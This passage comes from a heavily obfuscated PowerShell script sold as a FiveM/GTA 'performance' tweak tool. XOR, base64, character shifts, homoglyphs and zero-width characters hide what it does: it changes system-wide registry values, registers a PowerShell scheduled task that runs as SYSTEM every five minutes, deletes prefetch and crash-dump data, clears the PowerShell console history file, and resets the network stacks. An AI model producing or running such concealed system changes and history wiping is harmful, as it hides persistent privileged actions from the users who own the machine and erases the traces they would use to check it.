        New-ITeMPropErtY -pATH $D6oY -Name $($k2470='tQosUyo;';$b=[byte[]](0x24,0x23,0x06,0x1C,0x27,0x10,0x1B,0x42);$kb=[System.Text.Encoding]::UTF8.GetBytes($k2470);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -vaLuE (-74 -bxor -80) -pROPERtYtype DworD -foRCE | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b1V0LU5VbA==')))+('{0}' -f 'l'))
        NEw-itEMPrOpErTY -paTh $d6oy -NAme $($k7019='QuwS3.m';$b=[byte[]](0x02,0x16,0x1F,0x36,0x57,0x5B,0x01,0x38,0x1B,0x10,0x73,0x70,0x4F,0x19,0x34,0x12,0x18,0x21,0x4A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7019);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -VaLue 'H‍i​g‌h​' -proPERTYtYPe sTRIng -FOrcE | &($(-join('Y'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+16)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+16)%26))}else{[char]$c}}))+'ut-NULl')
        NeW-iTEmproperTy -PaTh $d6Oy -nAmE ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('U0ZJTyBQcmlvcml0eQ=='))) -VALUE (-join([char]0x48, [char]0x69, [char]0x67, [char]0x68)) -ProPErTytYpE STriNG -FoRCe | &((-join('oUt','-n'))+$(-join('Arr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}})))
    }
    &((-join([char]0x4E, [char]0x65, [char]0x57, [char]0x2D, [char]0x49, [char]0x74, [char]0x45, [char]0x4D, [char]0x70, [char]0x52, [char]0x4F, [char]0x50, [char]0x45, [char]0x52))+$($k5761=140;$b=[byte[]](0xf8,0xf5);-join($b|%{[char]($_-bxor$k5761)}))) -PaTh $($k8116='(6k0&1ZR.;%U';$b=[byte[]](0x60,0x7D,0x28,0x65,0x1C,0x6D,0x09,0x2B,0x5D,0x4F,0x40,0x38,0x74,0x71,0x0A,0x5D,0x43,0x72,0x35,0x3C,0x48,0x52,0x42,0x06,0x5C,0x59,0x19,0x55);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8116);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -NaME ([string]::Format('{0}{1}{2}{3}{4}{5}','Gam','eDV','R_','Enab','le','d')) -VaLUe (81 -bxor 81) -PrOPErtYtYPE DworD -FOrCE | &(('ou'+'T-'+'Nu')+$($k9990='BX98i$wqjem';$b=[byte[]](0x2E,0x14);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9990);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})))
    PowercFg /H &($(-join('Q'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))+('F'+'f')) | &($($k3042='K0FS-v=L..2';$b=[byte[]](0x04);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3042);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+"$([char]0x75)$([char]0x54)$([char]0x2D)$([char]0x4E)$([char]0x55)$([char]0x6C)$([char]0x4C)")

    # 8. EXTREmE FIvEm CPU kERNeL INjeCTiOns
    &($(-join('zUlWh-kRV'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+23)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+23)%26))}else{[char]$c}}))+('{0}' -f 'T')) $($k4343=245;$b=[byte[]](0xae,0xcb,0xa8,0xd5,0xb9,0x9a,0x96,0x9e,0x9c,0x9b,0x92,0xd5,0xb3,0x9c,0x83,0x90,0xb8,0xd5,0xa5,0x87,0x9a,0x96,0x90,0x86,0x86,0xd5,0xa6,0x96,0x9d,0x90,0x91,0x80,0x99,0x9c,0x9b,0x92,0xd5,0xb8,0x94,0x81,0x87,0x9c,0x8d,0xd5,0x9c,0x9b,0x81,0x9a,0xd5,0xbd,0x9c,0x92,0x9d,0xd5,0xa5,0x87,0x9c,0x9a,0x87,0x9c,0x81,0x8c,0xdb,0xdb,0xdb);-join($b|%{[char]($_-bxor$k4343)})) -FoREgRounDcOlor GREen
    $Xodr = @(('F'+'iveM.'+'ex'+'e'), $($k6364='X11^^%:';$b=[byte[]](0x1E,0x58,0x47,0x3B,0x13,0x7A,0x7D,0x0C,0x70,0x61,0x2C,0x31,0x46,0x5F,0x2B,0x42,0x1F,0x3B,0x26,0x40);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6364);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})), 'F‌i‌v​e‍M‍_‍b‌2‍6‌9‍9​_‍G‌T​A​P​r​o‌c‍e​s​s‌.‌e‍x​e‍', 'F‌i‌v‍e‍M‌_​b‌3​0‍9‍5​_‌G‍T​A‌P‍r‌o​c‌e‌s​s​.‍e‌x​e​', ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Rml2ZU1fYjMyNThfR1RBUHJvY2Vzcy5leGU='))), ('{0}{1}{2}' -f 'GTA5.','e','xe'))
    foreach ($keXHJ7 in $xoDr) {
        $MowDzZt = ((-join([char]0x48, [char]0x4B, [char]0x4C, [char]0x4D, [char]0x3A, [char]0x5C, [char]0x53, [char]0x4F, [char]0x46, [char]0x54, [char]0x57, [char]0x41, [char]0x52, [char]0x45, [char]0x5C, [char]0x4D, [char]0x69, [char]0x63, [char]0x72, [char]0x6F, [char]0x73, [char]0x6F, [char]0x66, [char]0x74, [char]0x5C, [char]0x57, [char]0x69, [char]0x6E, [char]0x64, [char]0x6F, [char]0x77, [char]0x73, [char]0x20, [char]0x4E, [char]0x54, [char]0x5C, [char]0x43, [char]0x75, [char]0x72, [char]0x72, [char]0x65, [char]0x6E, [char]0x74, [char]0x56, [char]0x65, [char]0x72, [char]0x73, [char]0x69, [char]0x6F, [char]0x6E, [char]0x5C, [char]0x49, [char]0x6D, [char]0x61, [char]0x67, [char]0x65, [char]0x20, [char]0x46, [char]0x69, [char]0x6C, [char]0x65, [char]0x20, [char]0x45, [char]0x78, [char]0x65, [char]0x63, [char]0x75, [char]0x74, [char]0x69, [char]0x6F, [char]0x6E, [char]0x20, [char]0x4F, [char]0x70, [char]0x74, [char]0x69, [char]0x6F, [char]0x6E, [char]0x73, [char]0x5C)) + $keXhJ7)
        if (-not (&($($k8447='r<S^>%KWF1';$b=[byte[]](0x06,0x59);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8447);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x53,0x74,0x2D,0x50,0x61,0x54,0x48)))) $mOwDZZt)) { &(('New'+'-I'+'T'+'e')+$($k4167=83;$b=[byte[]](0x1e);-join($b|%{[char]($_-bxor$k4167)}))) -pATH $MowDzZt -FOrCE | Out-nUl`l }
        if (-not (&(([System.Text.Encoding]::UTF8.GetString([byte[]](0x74,0x65)))+(-join([char]0x53, [char]0x54, [char]0x2D, [char]0x50, [char]0x41, [char]0x54, [char]0x68))) ($MOwdZzT + ([string]::Format('{0}{1}{2}{3}{4}{5}','\','Pe','r','fOpti','on','s'))))) { &((-join([char]0x6E, [char]0x65, [char]0x57, [char]0x2D))+$(-join('ozKS'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}}))) -pAth ($MOwdZzT + $($k4425='BY*?+$a:rPxLMM';$b=[byte[]](0x1E,0x09,0x4F,0x4D,0x4D,0x6B,0x11,0x4E,0x1B,0x3F,0x16,0x3F);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4425);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -force | &($(-join('bH'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))+(-join([char]0x54, [char]0x2D, [char]0x6E, [char]0x75, [char]0x6C, [char]0x6C))) }
        &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bkV3LWl0RW1QUm9wRXI=')))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dFk=')))) -PATh ($MOwdZzT + ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('XFBlcmZPcHRpb25z')))) -nAME 'C‍p‍u​P‌r‍i‍o​r‍i​t‍y‌C​l​a​s‍s‌' -ValuE (-11 -bxor -10) -ProPERtYtYPe dwoRd -FORce | &($($k6512=148;$b=[byte[]](0xdb,0xc1,0xe0,0xb9,0xda);-join($b|%{[char]($_-bxor$k6512)}))+'u​L‍L‍')
    }

    $kCMog = 'H‍K‌L​M‍:​\‌S‍Y‌S​T‍E‌M‍\‌C‍u​r​r​e‍n​t‌C‌o‌n‌t‌r‍o‌l‌S​e‍t​\​C‌o​n​t​r‍o‍l‍\​S‌e‍s‍s‍i​o‌n‌ ‍M​a‍n​a​g‌e‌r‌\‍M‍e‌m​o​r‍y‍ ‍M​a​n‍a​g‍e‌m‍e​n‍t‌'
    &($(-join('LCu-grCKnpM'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UGVyVHk=')))) -PAth $kCmOG -nAMe (-join('L','a','rgeS','y','stemCach','e')) -vaLUe (291 % 58) -pRoPERtyTyPE dWOrD -forCE | &($(-join('HnM'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+('-n'+'UL'+'L'))
    NeW-ITEmprOpeRTY -PAtH $kCMog -NaME $(-join('YeyzksVgmky'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}})) -ValuE 0XFfFfFfff -PROpERTYTyPe dWOrD -FOrCe | &($($k1199='A9=Kw+YO}j^?=Z';$b=[byte[]](0x0E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1199);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+(-join([char]0x55, [char]0x54, [char]0x2D, [char]0x4E, [char]0x75, [char]0x6C, [char]0x6C)))

    # 9. backGroUNd AUto-fLuSH Ram StANDby CacHE (PAtchED pRopErly)
    &("$([char]0x57)$([char]0x52)$([char]0x49)$([char]0x54)$([char]0x65)$([char]0x2D)"+('H'+'OS'+'t')) (('[>'+']'+' Injec'+'ti'+'ng'+' ') + $(23 - 18) + (-join('-Mi','n Sched','uled ','Aut','o-RAM ','E','ngine ','(','Fix Leak',').','..'))) -FoREGrOUNdcoLoR Green
    $SUJq = &('N‍e‌w‍-‍S‍C‌H‍e‌D​U​l‌E‌D​T‍A‍s‍K​A‍c‌'+$(-join('zOUT'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}}))) -exEcUTE $($k3357=44;$b=[byte[]](0x5c,0x43,0x5b,0x49,0x5e,0x5f,0x44,0x49,0x40,0x40,0x02,0x49,0x54,0x49);-join($b|%{[char]($_-bxor$k3357)})) -ARGumEnt $(-join('-ZaBdaruxq -Oayymzp ```'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}}))[System.GC]::Collect(); [System.GC]::WaitForPendingFinalizers();```"('
‌
‍ ‍ ​ ‍ ​' + $nv0uevq + ' = &(''nЕw-SсhЕDUlеDТаsК''+''ТrIggЕR'') -АТlоgоN
    ' + $nv0UEVQ + '.RереtItIОN.InТеRVаl = (Nеw`-tIМЕsрАn -МInutеs 5)
    ' + $G4guoFA + ' = &(''nЕw-sсhеdUlЕDТаsК''+''SеТТINGSSЕТ'') -АlLоWSТаrТIFОNbаttЕrіЕs -DоnТstоріFgоInGоnВАТТЕrіЕS -StАrТWНЕNаvаіLаВLЕ
    rеgIsТеr-SСНЕDUlеdТАsk -tАSknАМе ')LitePro_Memory_AutoFlush" -aCTION $SuJQ -tRigGER $Nv0uevq -SetTINgS $g4gUOFA -USeR ('{0}{1}' -f 'SYSTE','M') -fOrCe | &($($k5127='nDfEUSvoy';$b=[byte[]](0x21);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5127);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('{0}{1}' -f 'uT-NU','Ll'))

    # 10. DeEp StOrage & POwersHELL hISTORY jUNK CleaNer ENGinE
    &(('{0}{1}' -f 'wr','i')+$(-join('Gr-uBfg'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+13)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+13)%26))}else{[char]$c}}))) ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Wz5dIFB1cmdpbmcgRGVlcCBTdG9yYWdlIEp1bmsgJiBQb3dlclNoZWxsIEhpc3RvcnkuLi4='))) -ForEGrouNdcolOr YeLLOW
    
    # targEt CommOn wIndOwS JUNK pAths
    $DEEjx = @(
        ($JJOF + (':USERP'+'ROF'+'ILE\'+'AppData\'+'Loc'+'al\Temp'+'\*')),
        ($JJOF + ':SуstеmRооt\Теmр\*'),
        ($JJOF + "$([char]0x3A)$([char]0x53)$([char]0x79)$([char]0x73)$([char]0x74)$([char]0x65)$([char]0x6D)$([char]0x52)$([char]0x6F)$([char]0x6F)$([char]0x74)$([char]0x5C)$([char]0x50)$([char]0x72)$([char]0x65)$([char]0x66)$([char]0x65)$([char]0x74)$([char]0x63)$([char]0x68)$([char]0x5C)$([char]0x2A)"),
        ($JJOF + $(-join(':CicdowByyd\CypdgkboNscdbsledsyx\Nygxvykn\*'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+16)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+16)%26))}else{[char]$c}}))),
        ($JJOF + ':LОСАLАРРDАТА\СrаshDumрs\*'),
        ($JJOF + $($k7356=74;$b=[byte[]](0x70,0x1a,0x38,0x25,0x2d,0x38,0x2b,0x27,0x0e,0x2b,0x3e,0x2b,0x16,0x07,0x23,0x29,0x38,0x25,0x39,0x25,0x2c,0x3e,0x16,0x1d,0x23,0x24,0x2e,0x25,0x3d,0x39,0x16,0x1d,0x0f,0x18,0x16,0x60);-join($b|%{[char]($_-bxor$k7356)})))
    )
    foreach ($ZTyedU in $Deejx) {
        &($($k1879=')1KO@';$b=[byte[]](0x7B,0x74,0x06,0x20,0x16,0x6C,0x1C,0x22,0x1B);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1879);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$($k3064=50;$b=[byte[]](0x77,0x5f);-join($b|%{[char]($_-bxor$k3064)}))) -PATh $ZtYedU -REcuRse -foRCE -errORactiOn SileNtLycoNtINUe | &(([string]::Format('{0}{1}{2}','o','U','T'))+('{0}{1}{2}' -f '-N','Ul','l'))
    }

    # 🔥 NEW: cleAR PoweRShEll ConSole hiStORY FilE DaTA
    &(('{0}{1}' -f 'C','LeaR')+$(-join('-vWGhcFM'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))) -erRoRaCTION sIlEntLyCONtINue
    $jB6nQ = ($JJOF + ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}',':APPD','AT','A\Mic','ros','oft\W','in','dows\','Pow','erShe','ll','\PS','Rea','dLin','e\','Co','n','sole','Host_','hi','s','to','ry','.txt')))
    if (&($($k1572='1082X7';$b=[byte[]](0x65,0x75,0x6B,0x66);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1572);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$(-join('-EpIW'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}}))) $JB6nQ) {
        &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Y0xFYXItY09u')))+([string]::Format('{0}{1}{2}','t','EN','t'))) -PATh $JB6Nq -eRrOractiOn SiLENTlycoNtINUE
    }

    # fluSH DnS rESolvers
    &($(-join('eLYkJB'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+4)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+4)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SUc=')))) /FlUshDNs | &(('O'+'u'+'t-')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bnVsbA=='))))
    NeTSH &((-join([char]0x69))+"$([char]0x6E)$([char]0x54)") IP &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cmU=')))+('sE'+'T')) | &(([string]::Format('{0}{1}','o','uT-'))+(-join('N','uL','L')))
    NETSH WInSoC`K &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Ug==')))+$($k5671='YoC#C_tL_Y4S:&';$b=[byte[]](0x1C,0x3C,0x26,0x77);$kb=[System.Text.Encoding]::UTF8.GetBytes($k5671);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) | &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x6F,0x55)))+'t-nulL')

    WrItE-hosT ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}' -f '``n','[','-] A','LL P','ERFO','RMAN','CE ','& D','EEP',' C','LE','AN M','ODU','LES ','APPLI','ED','!') -foREGRoUNdColOr grEeN
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('d1JpdEU=')))+$(-join('-OvzA'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+19)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+19)%26))}else{[char]$c}}))) ([string]::Format('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}','[!] A',' Sy','stem',' R','EBOOT',' i','s r','ecomm','end','ed to',' lock',' in',' all',' ','eng','i','ne c','ha','nges','.')) -FOrEGrOuNdCOlOr YellOW
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cmVhZC1Ib1M=')))+'t') (-join([char]0x60, [char]0x60, [char]0x6E, [char]0x50, [char]0x72, [char]0x65, [char]0x73, [char]0x73, [char]0x20, [char]0x45, [char]0x6E, [char]0x74, [char]0x65, [char]0x72, [char]0x20, [char]0x74, [char]0x6F, [char]0x20, [char]0x72, [char]0x65, [char]0x74, [char]0x75, [char]0x72, [char]0x6E, [char]0x20, [char]0x74, [char]0x6F, [char]0x20, [char]0x4D, [char]0x65, [char]0x6E, [char]0x75, [char]0x2E, [char]0x2E, [char]0x2E))
}

function gAMe-QOspOliCy {
    Write`-HoSt $(-join('``z==========================================================='.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+14)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+14)%26))}else{[char]$c}})) -foREgROUndcoLor BlUE
    &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpVEUt')))+$($k7586='gWbZ-C8n)';$b=[byte[]](0x2F,0x18,0x11,0x0E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7586);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) "$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x46)$([char]0x49)$([char]0x56)$([char]0x45)$([char]0x20)$([char]0x4D)$([char]0x20)$([char]0x45)$([char]0x4E)$([char]0x47)$([char]0x49)$([char]0x4E)$([char]0x45)$([char]0x20)$([char]0x56)$([char]0x49)$([char]0x50)$([char]0x20)$([char]0x4E)$([char]0x45)$([char]0x54)$([char]0x57)$([char]0x4F)$([char]0x52)$([char]0x4B)$([char]0x20)$([char]0x49)$([char]0x4E)$([char]0x4A)$([char]0x45)$([char]0x43)$([char]0x54)$([char]0x49)$([char]0x4F)$([char]0x4E)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)$([char]0x20)" -FoReGrOUnDcoLoR BlUe
    &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x57,0x72,0x49,0x54,0x65,0x2D,0x48,0x4F)))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x73,0x74)))) "$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)$([char]0x3D)" -FOreGrOunDcolor BlUE
    &(('w'+'R'+'iT')+$($k8641='REfXH:k';$b=[byte[]](0x37,0x68,0x2E,0x37,0x1B,0x6E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8641);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) ((-join('[>','] R','ou','ti','ng ','DSCP ')) + $(966 / 21) + (' Lan'+'es'+' o'+'nto all'+' F'+'iveM s'+'u'+'b'+'syst'+'ems...')) -foRegROUNDCoLor grEeN
    
    $hPbb7i = @(([System.Text.Encoding]::UTF8.GetString([byte[]](0x46,0x69,0x76,0x65,0x4D,0x2E,0x65,0x78,0x65))), (-join('FiveM_GT','AProce','ss.','exe')), ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}' -f 'F','i','ve','M_','b269','9_GT','A','Pro','ce','s','s.','ex','e'), (-join([char]0x46, [char]0x69, [char]0x76, [char]0x65, [char]0x4D, [char]0x5F, [char]0x62, [char]0x32, [char]0x38, [char]0x30, [char]0x32, [char]0x5F, [char]0x47, [char]0x54, [char]0x41, [char]0x50, [char]0x72, [char]0x6F, [char]0x63, [char]0x65, [char]0x73, [char]0x73, [char]0x2E, [char]0x65, [char]0x78, [char]0x65)), $(-join('WzmvD_s3095_XKRGiftvjj.vov'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}})), $($k7921='Qlaw(SG9^k4Cr';$b=[byte[]](0x17,0x05,0x17,0x12,0x65,0x0C,0x25,0x0A,0x6C,0x5E,0x0C,0x1C,0x35,0x05,0x2D,0x31,0x05,0x47,0x30,0x22,0x4A,0x2D,0x45,0x51,0x3B,0x17);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7921);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})), $($k9787='lzcBW';$b=[byte[]](0x2A,0x13,0x15,0x27,0x1A,0x33,0x18,0x50,0x73,0x6F,0x58,0x25,0x24,0x16,0x16,0x3C,0x08,0x0C,0x21,0x32,0x1F,0x09,0x4D,0x27,0x2F,0x09);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9787);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})), ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('R1RBNS5leGU='))))

    if (-not (&($(-join('YjX'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}}))+(-join([char]0x54, [char]0x2D, [char]0x50, [char]0x61, [char]0x54, [char]0x48))) ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}' -f 'HKLM',':\S','O','FTW','ARE\','P','ol','icie','s\M','icros','oft\W','ind','ows\Q','oS'))) {
        &((-join([char]0x6E, [char]0x65, [char]0x77, [char]0x2D, [char]0x69, [char]0x74))+$(-join('ow'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+16)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+16)%26))}else{[char]$c}}))) -PATh ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SEtMTTpcU09GVFdBUkVcUG9saWNpZXNcTWljcm9zb2Z0XFdpbmRvd3NcUW9T'))) -FoRCe | &('Оut-NUl'+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TA=='))))
    }

    foreach ($kExHJ7 in $hpBb7i) {
        $NweU = ("$([char]0x48)$([char]0x4B)$([char]0x4C)$([char]0x4D)$([char]0x3A)$([char]0x5C)$([char]0x53)$([char]0x4F)$([char]0x46)$([char]0x54)$([char]0x57)$([char]0x41)$([char]0x52)$([char]0x45)$([char]0x5C)$([char]0x50)$([char]0x6F)$([char]0x6C)$([char]0x69)$([char]0x63)$([char]0x69)$([char]0x65)$([char]0x73)$([char]0x5C)$([char]0x4D)$([char]0x69)$([char]0x63)$([char]0x72)$([char]0x6F)$([char]0x73)$([char]0x6F)$([char]0x66)$([char]0x74)$([char]0x5C)$([char]0x57)$([char]0x69)$([char]0x6E)$([char]0x64)$([char]0x6F)$([char]0x77)$([char]0x73)$([char]0x5C)$([char]0x51)$([char]0x6F)$([char]0x53)$([char]0x5C)$([char]0x50)$([char]0x72)$([char]0x69)$([char]0x6F)$([char]0x72)$([char]0x69)$([char]0x74)$([char]0x79)$([char]0x5F)$([char]0x50)$([char]0x61)$([char]0x73)$([char]0x73)$([char]0x5F)" + $keXhJ7)
        if (-not (&(([System.Text.Encoding]::UTF8.GetString([byte[]](0x74,0x45)))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x53,0x74,0x2D,0x50,0x61,0x54,0x68)))) $nWeU)) { &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bmV3LWk=')))+$(-join('hsa'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))) -pATh $NWEu -fORce | &($($k6575='y,#A9b';$b=[byte[]](0x36,0x79,0x77,0x6C,0x57);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6575);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+$($k9423=139;$b=[byte[]](0xde,0xc7,0xc7);-join($b|%{[char]($_-bxor$k9423)}))) }

        &($(-join('hYq-cnygJlijy'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+6)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+6)%26))}else{[char]$c}}))+(-join('rT','y'))) -PatH $nweU -nAME ('Ver'+'si'+'o'+'n') -VAlue (('1'+'.') + $(-17 + 17)) -PropeRTytYpE sTRing -fORCe | &(('{0}{1}' -f 'OUT-N','u')+(-join([char]0x4C, [char]0x6C)))
        neW-ITEMPROPeRty -Path $NWeU -NAMe ([string]::Format('{0}{1}{2}{3}{4}{5}','Ap','pli','catio','n ','N','ame')) -vALUe $kexHj7 -PrOPErtYtYPE stRING -foRcE | OuT-nu`LL
